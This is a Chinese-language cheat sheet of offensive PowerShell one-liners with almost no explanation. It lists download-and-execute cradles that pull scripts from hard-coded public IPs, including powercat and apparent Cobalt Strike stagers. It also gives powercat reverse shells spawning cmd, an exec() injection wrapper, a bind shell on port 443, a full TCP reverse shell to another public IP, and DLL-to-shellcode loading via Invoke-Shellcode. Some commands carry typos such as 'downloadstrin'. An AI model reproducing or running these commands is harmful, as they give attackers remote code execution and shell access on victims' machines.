自win7/win 2008开始
win系统增加了powershell工具。
PowerShell是一种命令行外壳程序和脚本环境
文件路径:
where powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
支持系统: win7/win2008 =<
powershell (new-objectNet.WebClient).DownloadFile('http://url/aa.ps1','c:\bb.ps1')
PowerShell:一个强大的命令行工具,可用于下载文件落地和管理网络连接。
powershell -Command "& 'path\to\program.exe'"
PowerShell \ ConvertTo-Shellcode.ps1:将 DLL 转换为 shellcode
使用 powershell 转换 DLL 并使用 Invoke-Shellcode 加载
Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1')
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1');powercat -c 101.43.159.27 -p 1474 -e cmd
exec("powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1');powercat -c 101.43.159.27 -p 1474 -e cmd");
iex(new-object system.net.webclient).downloadstrin('http://101.43.159.27/cslow.ps1')
- powershell iex(new-object system.net.webclient).downloadstrin('http://101.43.159.27/cslow.ps1')
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://101.43.159.27/cs32low.ps1')"
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('120.48.83.89',12369);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"